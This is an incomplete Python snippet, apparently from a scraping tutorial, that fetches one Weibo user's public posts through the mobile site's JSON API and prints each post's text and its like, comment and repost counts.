headers = {
'Host': 'm.weibo.cn',
'Referer': 'https://m.weibo.cn/u/2830678474',
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36',
'X-Requested-With': 'XMLHttpRequest',
}
max_page = 10
array = []
def get_page(page):
params = {
'type': 'uid',
'value': '3217179555',
'containerid': '1076033217179555',
'page': page
}
url = base_url + urlencode(params)
try:
response = requests.get(url, headers=headers)
if response.status_code == 200:
return response.json(), page
except requests.ConnectionError as e:
print('Error', e.args)
def parse_page(json, page: int):
if json:
items = json.get('data').get('cards')
for index, item in enumerate(items):
if page == 1 and index == 1:
continue
else:
item = item.get('mblog', {})
weibo = {}
weibo['id'] = item.get('id')
weibo['text'] = pq(item.get('text')).text()
weibo['attitudes'] = item.get('attitudes_count')
weibo['comments'] = item.get('comments_count')
weibo['reposts'] = item.get('reposts_count')
yield weibo
if __name__ == '__main__':
for page in range(1, max_page + 1):
json = get_page(page)
results = parse_page(*json)
for result in results:
print(result)
array.append(result)
time.sleep(1)
        # Skipping writing the results to a file for now.
| zh | 0.995915 | # 不先添加到文件中了 | 2.981446 | 3 |